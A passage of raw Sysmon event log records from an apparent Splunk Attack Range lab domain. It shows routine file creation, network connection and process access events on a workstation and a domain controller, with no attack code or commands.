Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CE96AEFF6884B188FAE65A28A6620FC6,SHA256=CC16BDB218FF97FBB498D8B81109CA002DB4616167BFA1C6DF89DCC39FA0BA5E,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050274Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:26.367{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-59355-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050273Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:26.195{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-56411-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050272Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:25.753{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52524-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000050271Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:28.130{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA85BEC66B5E1D15B0BA2B65EAD162CF,SHA256=B33C186B9E2701024CE52234BE9B651D006026AD5C97BF7FAE0794AE3C895611,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000074580Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:28.238{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57535-false10.0.1.12-8000- 354300x800000000000000074579Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:28.220{A7A01FEF-B622-607E-0100-00000000BB01}4SystemNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-339.attackrange.local57534-false10.0.1.14win-dc-339.attackrange.local445microsoft-ds 354300x800000000000000074578Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:28.220{A7A01FEF-B622-607E-0100-00000000BB01}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57534-false10.0.1.14win-dc-339.attackrange.local445microsoft-ds 354300x800000000000000074577Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:28.219{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local63819- 354300x800000000000000074576Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:27.962{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-29828-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000074575Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:29.046{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=907E1546450F20D66B1A73130A513EA8,SHA256=456C9BCF69204A05006478D00A3A04220E3EEAF59961D8C0EB8C804DC6163F5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074574Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:29.046{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AEA5A7A9E023451424181C2721998B28,SHA256=715AC3611A80014E60A0DDFF13FEB85CF0AA0B70622C2B3597A275058C0334A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074573Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:29.030{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85C83A7616414AA32AE182438B602503,SHA256=A0DD2AD92305C8022B8F95FA3F9C193C3DB9C73FC8E2108AB67C17CAC92ED536,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074572Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:29.030{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=3009ED0A52A36D4FC05946457BACC981,SHA256=0337C7BA0EC5936A721DD9D105F32E8F1FE607368339BB7539186A30C1CA45F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074571Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:29.030{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=F56FA42B063E325F01F63C604D567BC4,SHA256=D406DD0C73738F643C01AC90379215E3E853289E9EC792A1917711DCD71987D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074570Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:29.030{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=A613DCBE4846E28E6076A1135FBCB232,SHA256=DB71FD9C3290BE2039464AF96CFFA72AB9C1993DDD4747AFF08A694E8B821DE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074569Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:29.030{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A6CAB6DA893B4EEEE6CD41C79E07C82F,SHA256=9D5D3FA7042886B9DD6B196BF946C815F7F2338AE7D0CA330D4591137BF1F245,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050276Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:29.177{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E9D5735C73A4FDBC24F7C5E8B81227C,SHA256=FCC094D99D5F7BCB62A3ADC839D77E8A5AC3A3E7212F322705B88155D9DBE0ED,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000074780Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.983{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074779Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.967{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000074778Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.967{A7A01FEF-B626-607E-1100-00000000BB01}1176NT AUTHORITY\LOCAL SERVICEC:\Windows\system32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\FontCache-Obsolete-687.datMD5=1A9203AB729B18D0F545825C15F38209,SHA256=E0499B3841D8E530CA8203D56A81F1B6018DCA35360B0C70B37C3068886A1429,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000074777Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.967{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBDA-607E-D10C-00000000BB01}4800C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074776Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.967{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBDA-607E-D10C-00000000BB01}4800C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000074775Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.967{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074774Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.952{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074773Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.936{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074772Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.921{A7A01FEF-EBDA-607E-D00C-00000000BB01}36643168C:\Windows\system32\conhost.exe{A7A01FEF-EBDA-607E-CF0C-00000000BB01}4380C:\Program Files\Microsoft Office\root\integration\integrator.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074771Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.921{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074770Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.921{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBDA-607E-D00C-00000000BB01}3664C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074769Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.905{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074768Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.905{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBDA-607E-CF0C-00000000BB01}4380C:\Program Files\Microsoft Office\root\integration\integrator.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074767Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.905{A7A01FEF-EAF3-607E-6E0B-00000000BB01}50921828C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-EBDA-607E-CF0C-00000000BB01}4380C:\Program Files\Microsoft Office\root\integration\integrator.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+108db1|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+108beb|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+108859|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+7330e|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+7319a|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+11e95a|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+442813|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+b0474|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c5a8d|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c3bf7|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+188f9a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074766Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.905{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074765Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.889{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000074764Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.874{A7A01FEF-EBDA-607E-BA0C-00000000BB01}1992NT AUTHORITY\SYSTEMC:\Program Files\Microsoft Office\root\integration\integrator.exeC:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\integrator.exe.db-walMD5=8CDDE72571A676599B63EEE5C2A803BD,SHA256=40294C01E7195CDFBB54C4CCE993AB10ED293D875795C066E55858DC33C11423,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074763Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.874{A7A01FEF-EBDA-607E-BA0C-00000000BB01}1992NT AUTHORITY\SYSTEMC:\Program Files\Microsoft Office\root\integration\integrator.exeC:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\integrator.exe.db-shmMD5=3790C7CD90BC52C26356BF1DD7581C70,SHA256=E4453961B25F3FC5194EE867E5CEA12EAB365894CB0B2C30665D427BB4B0296B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000074762Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.874{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000074761Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.874{A7A01FEF-B626-607E-1100-00000000BB01}1176NT AUTHORITY\LOCAL SERVICEC:\Windows\system32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\FontCache-Obsolete-593.datMD5=41935C48948F0EB16BB7B33E22F13C09,SHA256=7F63FB1ED3E064042D2DC40436DD9CB9D0069208676FF973EA762D9EDEE23A95,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000074760Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.874{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074759Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.858{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074758Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.842{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074757Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.842{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074756Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.827{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074755Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.827{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074754Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.811{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074753Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.811{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000074752Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 